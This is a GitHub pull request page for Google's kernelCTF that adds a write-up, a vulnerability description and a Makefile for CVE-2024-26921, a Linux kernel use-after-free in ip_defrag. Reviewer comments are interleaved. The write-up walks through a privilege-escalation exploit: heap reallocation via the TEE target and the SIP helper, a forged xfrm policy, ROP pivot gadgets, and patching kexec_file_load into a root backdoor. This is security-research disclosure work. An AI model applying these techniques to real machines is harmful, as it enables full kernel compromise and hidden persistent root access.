-
Notifications
You must be signed in to change notification settings - Fork 524
kernelCTF: add CVE-2024-26921_lts_cos #310
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
base: master
Are you sure you want to change the base?
Changes from all commits
File filter
Filter by extension
Conversations
Jump to
Diff view
Diff view
There are no files selected for viewing
| Original file line number | Diff line number | Diff line change | ||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| @@ -0,0 +1,176 @@ | ||||||||||||||
| ## Overview | ||||||||||||||
|
|
||||||||||||||
| Let's look at what we need to perform the attack. | ||||||||||||||
|
|
||||||||||||||
| ### Socket to send the packet through | ||||||||||||||
|
|
||||||||||||||
| Different socket families have different handling of the routing and fragmentation issues. | ||||||||||||||
| We do not want to use upper layer protocols like TCP or UDP, because they perform their own fragmentation and we need to trigger fragmentation at the IP layer. | ||||||||||||||
|
|
||||||||||||||
| Second thing to consider is the kmalloc cache used to allocate struct sock. Most socket families have a dedicated cache, but some use a regular kmalloc(), giving us a simple way to reallocate the freed object without performing a cross-cache attack. | ||||||||||||||
|
|
||||||||||||||
| And finally, some sockets use a SOCK_RCU_FREE flag which causes sk_destruct() to wait for an RCU grace period before freeing the sock object and this would also make exploitation much harder. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||||||||||
|
|
||||||||||||||
| The socket family that fulfills all those requirements is AF_PACKET (used for sending raw packets at layer 2). | ||||||||||||||
|
|
||||||||||||||
| This means we need to set our own layer 2 and layer 3 headers and choose an output device for the packet. | ||||||||||||||
| No routing will be done, the packet will go straight to the output queue of a selected device. | ||||||||||||||
|
|
||||||||||||||
| ### Device driver to call ip_local_out() | ||||||||||||||
|
|
||||||||||||||
| Because we send our packets at layer 2, ip_send_skb() won't be called and we need to find another way to trigger ip_local_out(). | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||||||||||
| Fortunately, it is used by IPvlan driver: | ||||||||||||||
| ``` | ||||||||||||||
| static int ipvlan_process_v4_outbound(struct sk_buff *skb) | ||||||||||||||
| { | ||||||||||||||
| ... | ||||||||||||||
| skb_dst_set(skb, &rt->dst); | ||||||||||||||
|
|
||||||||||||||
| memset(IPCB(skb), 0, sizeof(*IPCB(skb))); | ||||||||||||||
|
|
||||||||||||||
| err = ip_local_out(net, skb->sk, skb); | ||||||||||||||
| ... | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| So our packets will be sent out of the IPvlan interface. | ||||||||||||||
| IPvlan needs a master ethernet device and we used the veth interface for that. | ||||||||||||||
|
|
||||||||||||||
|
|
||||||||||||||
| ### A way to close the socket fd before the ip_defrag() call | ||||||||||||||
|
|
||||||||||||||
| When our packet reaches ip_defrag(), the socket won't be freed if it is still referenced by the open file descriptor. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||||||||||
| We can call close() only after sendmsg() returns. The syscall returns after the packets is enqueued to the output device, so we might be able to try a race condition to close the fd in time, but there is a simpler way. | ||||||||||||||
|
|
||||||||||||||
| sch_plug queuing discipline can be used to stop the packets from being dequeued from a network device until a command to "unplug" is received through the netlink API. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||||||||||
|
|
||||||||||||||
| So the steps of our exploit are: | ||||||||||||||
| 1. "plug" the ipvlan interface | ||||||||||||||
| 2. Send a packet | ||||||||||||||
| 3. Close the socket | ||||||||||||||
| 4. "unplug" the ipvlan interface | ||||||||||||||
|
|
||||||||||||||
| These are actually all the steps needed to exploit the vulnerability, if we exclude the setup needed beforehand. | ||||||||||||||
|
|
||||||||||||||
| ### Network tools | ||||||||||||||
|
|
||||||||||||||
| The exploit needs external iptables and ip (from iproute2 package) binaries to set up rules and network interfaces. | ||||||||||||||
| These tools are not available in the current kernelCTF root image, so the tar archive with binaries and supporting libraries is attached to the exploit binary as a custom ELF section and extracted using objcopy during execution. | ||||||||||||||
|
|
||||||||||||||
| ## Triggering the IPv4 fragmentation | ||||||||||||||
|
|
||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. So we introduced veth in the "Device driver" section, how is it connected with ipv0 and ipv1? What is ipv0 and ipv1? How do we setup those interfaces? |
||||||||||||||
| The obvious idea is to send the MTU on the outgoing interface (ipv1) to a low value, but then our send() will just return a "Message too long" error. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
|
||||||||||||||
| Instead, we must reroute our packet to another interface with a low MTU (ipv0). This is done using a DNAT rule. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. So should we set high MTU to ipv1? Does this gives a bit more context? |
||||||||||||||
|
|
||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Show |
||||||||||||||
| ## Triggering ip_defrag() | ||||||||||||||
|
|
||||||||||||||
| Because we already have DNAT rules, the conntrack defrag hooks are installed and ip_defrag() will be called for each of our fragments, triggering the release of the sock object at the last fragment. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Does it explains situation correctly?
Suggested change
|
||||||||||||||
|
|
||||||||||||||
| ## Reallocating the victim object | ||||||||||||||
|
|
||||||||||||||
| To replace the victim object all we have to do is allocate from the kmalloc-2k cache on the same CPU. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. What structure we consider as "victim object"? My guess |
||||||||||||||
| This must be done before all the hooks finish, so there is no way to make them from the user space. | ||||||||||||||
| However, we can use whatever netfilter modules we want. There's a lot of them and some are bound to make new allocations. | ||||||||||||||
| This line of thinking leads us to a TEE target: | ||||||||||||||
| > The TEE target will clone a packet and redirect this clone to another machine on the local network segment. | ||||||||||||||
|
|
||||||||||||||
| Cloning a packet sounds great, as it involves copying the data we passed to the send() function. | ||||||||||||||
| There is a problem, though. Our packet's data needs to be larger then than 1024 bytes to be allocated from kmalloc-2k and skb stores larger packets like that using a fragment list. When TEE clones the skb, pskb_copy() is called and only space for the head is allocated from the regular kmalloc, the rest is zero-copied by cloning the fraglist. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. What is "fraglist"? What is "space for the head"? What are the structures used? |
||||||||||||||
|
|
||||||||||||||
| Fortunately, some netfilter modules need to look at the whole packet data in one piece (e.g. to search for patterns) instead of dealing with skb fragments. | ||||||||||||||
|
|
||||||||||||||
| One such example is a conntrack SIP helper. It calls skb_linearize() which transforms a fragmented skb to linear one, which involves allocating buffer for all the data using kmalloc and copying it there, which finally gives us a way to allocate from kmalloc-2k and overwrite the victim sock object with our data. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more.
Suggested change
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How exactly does skb_linearize() guarantee a kmalloc-2k hit? You mentioned the packet should be larger than 1024 bytes. Could you elaborate on the math here, how we ensure that newly linearized buffer lands squarely in the kmalloc-2k? |
||||||||||||||
|
|
||||||||||||||
| To summarize, by combining the TEE and SIP conntrack helper we are able to overwrite the victim sock object that will be used by the netfilter hooks. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How exactly are the TEE target and SIP helper chained together? Please explicitly state the pipeline/iptables rule sequence. |
||||||||||||||
|
|
||||||||||||||
| ## Getting RIP control | ||||||||||||||
|
|
||||||||||||||
| Controlling the struct sock object may seem like an instant win at first, but we soon discover that netfilter hooks rarely use the socket context and never call function pointers from that object. | ||||||||||||||
|
|
||||||||||||||
| The solution is the ip_route_me_harder() function which is called in the mangle table if some IPv4 parameters like src/dst address, TOS or mark change after mangle rules are executed: | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. What specific iptables mangle rule do you use in the exploit? |
||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| static unsigned int | ||||||||||||||
| ipt_mangle_out(void *priv, struct sk_buff *skb, const struct nf_hook_state *state) | ||||||||||||||
| { | ||||||||||||||
| ... | ||||||||||||||
| /* Save things which could affect route */ | ||||||||||||||
| mark = skb->mark; | ||||||||||||||
| iph = ip_hdr(skb); | ||||||||||||||
| saddr = iph->saddr; | ||||||||||||||
| daddr = iph->daddr; | ||||||||||||||
| tos = iph->tos; | ||||||||||||||
|
|
||||||||||||||
| ret = ipt_do_table(priv, skb, state); | ||||||||||||||
| /* Reroute for ANY change. */ | ||||||||||||||
| if (ret != NF_DROP && ret != NF_STOLEN) { | ||||||||||||||
| iph = ip_hdr(skb); | ||||||||||||||
|
|
||||||||||||||
| if (iph->saddr != saddr || | ||||||||||||||
| iph->daddr != daddr || | ||||||||||||||
| skb->mark != mark || | ||||||||||||||
| iph->tos != tos) { | ||||||||||||||
| err = ip_route_me_harder(state->net, state->sk, skb, RTN_UNSPEC); | ||||||||||||||
| ... | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| state->sk here is the pointer to our sock object. | ||||||||||||||
|
|
||||||||||||||
| ip_route_me_harder() calls xfrm_lookup() which examines sk->sk_policy and if the policy matches the current connection it eventually calls dst_alloc(). | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. What is the exact function call chain from xfrm_lookup() to dst_alloc()? |
||||||||||||||
| dst_alloc() calls the gc function pointer of the netns_xfrm.dst_ops struct and the netns_xfrm comes from the xfrm policy which is under our control. | ||||||||||||||
|
|
||||||||||||||
| So if we are able to craft a valid struct xfrm_policy that matches our connection, we will be able to get RIP control. | ||||||||||||||
|
|
||||||||||||||
| This policy is prepared in the prepare_policy(). | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Please explain in details how and which policy you prepare here in the writeup |
||||||||||||||
| The fake object for the sock itself is simple - we just need to set the sk_policy pointer and sk_mark value. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. How does sk->sk_mark play into this? Please elaborate |
||||||||||||||
|
|
||||||||||||||
| The policy object takes a lot of space and has pointer to other objects like netns_xfrm, so we used the [direct mapping storage technique](../../CVE-2024-26923_lts_cos/docs/novel-techniques.md) to place it at a known address in the kernel address space. | ||||||||||||||
|
|
||||||||||||||
| ## Pivot to ROP | ||||||||||||||
|
|
||||||||||||||
| When the gc pointer is called in the dst_alloc() the RDI register contains a pointer to dst_ops which is part of our fake netns_xfrm object. | ||||||||||||||
|
|
||||||||||||||
| Following gadgets were used to pivot to the ROP chain placed at dst_ops + 0x10 (our gc pointer is at dst_ops+0x08). | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| mov r8,QWORD PTR [rdi+0xc8] | ||||||||||||||
| mov eax,0x1 | ||||||||||||||
| test r8,r8 | ||||||||||||||
| je ffffffff82185d21 | ||||||||||||||
| mov rsi,rdi | ||||||||||||||
| mov rcx,r14 | ||||||||||||||
| mov rdi,rbp | ||||||||||||||
| mov rdx,r15 | ||||||||||||||
| call ffffffff82427a60 <__x86_indirect_thunk_r8> | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| This copies RDI to RSI | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| push rsi | ||||||||||||||
| jmp qword ptr [rsi + 0x39] | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| and finally | ||||||||||||||
|
|
||||||||||||||
| ``` | ||||||||||||||
| pop rsp | ||||||||||||||
| pop rbp | ||||||||||||||
| pop rbx | ||||||||||||||
| ret | ||||||||||||||
| ``` | ||||||||||||||
|
|
||||||||||||||
| ## Second pivot | ||||||||||||||
|
|
||||||||||||||
| To get more room for our ROP chain we move to a second location in the direct mapping using a simple pop rsp ; ret gadget. | ||||||||||||||
|
|
||||||||||||||
| ## Privilege escalation | ||||||||||||||
|
|
||||||||||||||
| Our ROP is executed from the ksoftirqd context, so we can't do a traditional commit_creds() to modify the current process's privileges. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. Since the ROP execution happens in ksoftirqd, it would be great to explicitly tie this back to the add_qdisc_plug unplug command in the text. A simple sentence explaining that unplugging the queue defers the packet processing to the softirq context perfectly bridges the gap. |
||||||||||||||
|
|
||||||||||||||
| We could try locating our exploit process and changing its privileges, but we decided to go with a different approach - we patch the kernel creating a backdoor that will grant root privileges to any process that executes a given syscall. | ||||||||||||||
|
|
||||||||||||||
| We chose a rarely used kexec_file_load() syscall and overwrote its code with our get_root function that does all traditional privileges escalation/namespace escape stuff: commit_creds(init_cred), switch_task_namespaces(pid, init_nsproxy) etc. | ||||||||||||||
|
|
||||||||||||||
| This function also returns a special value (0x777) that our user space code can use to detect if the system was already compromised. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. The text mentions that get_root returns 0x777 for user-space to check. However, looking at the inline assembly for get_root and the syscall invocation in main(), this logic seems to have been removed from the code. You should probably delete this sentence from the writeup so readers aren't looking for code that isn't there. |
||||||||||||||
|
|
||||||||||||||
| Patching the kernel function is done rop_patch_kernel_code() - it calls set_memory_rw() on destination memory and uses copy_user_generic() to write new code there. | ||||||||||||||
|
Collaborator
There was a problem hiding this comment. Choose a reason for hiding this commentThe reason will be displayed to describe this comment to others. Learn more. The writeup mentions using copy_user_generic(), but your code actually stages the payload via xattrs into the direct mapping and uses memcpy(). |
||||||||||||||
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,65 @@ | ||
| ## Requirements to trigger the vulnerability | ||
|
|
||
| - CAP_NET_ADMIN in a namespace is required | ||
| - Kernel configuration: CONFIG_INET | ||
| - User namespaces required: Yes | ||
|
|
||
| ## Commit which introduced the vulnerability | ||
|
|
||
| https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7026b1ddb6b8d4e6ee33dc2bd06c0ca8746fa7ab | ||
|
|
||
| ## Commit which fixed the vulnerability | ||
|
|
||
| https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=18685451fc4e546fc0e718580d32df3c0e5c8272 | ||
|
|
||
| ## Affected kernel versions | ||
|
|
||
| Introduced in 4.1. Fixed in 6.6.25, 5.10.226 and other stable trees. | ||
|
|
||
| ## Affected component, subsystem | ||
|
|
||
| net/ipv4 | ||
|
|
||
| ## Description | ||
|
|
||
| ip_local_out() is a function responsible for sending the locally generated IPV4 packets. | ||
| It will call the NF_INET_LOCAL_OUT netfilter hooks and eventually the dst_output(). | ||
|
|
||
| The usual call to ip_local_out() looks like this: | ||
| ``` | ||
| int ip_send_skb(struct net *net, struct sk_buff *skb) | ||
| { | ||
| int err; | ||
|
|
||
| err = ip_local_out(net, skb->sk, skb); | ||
| if (err) { | ||
| if (err > 0) | ||
| err = net_xmit_errno(err); | ||
| if (err) | ||
| IP_INC_STATS(net, IPSTATS_MIB_OUTDISCARDS); | ||
| } | ||
|
|
||
| return err; | ||
| } | ||
| ``` | ||
|
|
||
| Pointer to the socket associated with the skb is passed as an argument to ip_local_out() and then to all the netfilter hooks: | ||
|
|
||
| ``` | ||
| int __ip_local_out(struct net *net, struct sock *sk, struct sk_buff *skb) | ||
| { | ||
| ... | ||
| return nf_hook(NFPROTO_IPV4, NF_INET_LOCAL_OUT, | ||
| net, sk, skb, NULL, skb_dst(skb)->dev, | ||
| dst_output); | ||
|
|
||
| } | ||
| ``` | ||
|
|
||
| skb holds a reference to a socket. In normal conditions, skb is released only after its output path is finished or until the skb is received by the upper layers of the input stack (in scenarios when the outgoing packet is routed back to a local interface). | ||
| This ensures the associated socket is valid while the netfilter hooks are executing. | ||
|
|
||
| ip_defrag() is most often called in the input path and it calls skb_orphan()/kfree_skb() on the fragment skb, assuming it is no longer needed. | ||
| However, ip_defrag() can be also called in the output path by the netfilter conntrack hook ipv4_conntrack_defrag(). | ||
|
|
||
| If that happens, the skb will be released and if it is a last reference to the socket, it will be released as well, causing a use-after-free when next hooks are called and in the ip_finish_output(). |
| Original file line number | Diff line number | Diff line change |
|---|---|---|
| @@ -0,0 +1,10 @@ | ||
| INCLUDES = -I/usr/include/libnl3 | ||
| LIBS = -L. -pthread -lnl-cli-3 -lnl-route-3 -lnl-3 -ldl | ||
| CFLAGS = -fomit-frame-pointer -static -fcf-protection=none | ||
|
|
||
| exploit: exploit.c kernelver_16919.450.26.h | ||
| gcc -o $@ exploit.c $(INCLUDES) $(CFLAGS) $(LIBS) | ||
| objcopy --add-section tools=tools.tar.gz $@ | ||
|
|
||
| prerequisites: | ||
| sudo apt-get install libnl-cli-3-dev libnl-route-3-dev |
There was a problem hiding this comment.
Choose a reason for hiding this comment
The reason will be displayed to describe this comment to others. Learn more.
Please add a bit of summary / "battle plan" type of paragraph. The reader would need the overview of what we're trying to do.
How about smth like this: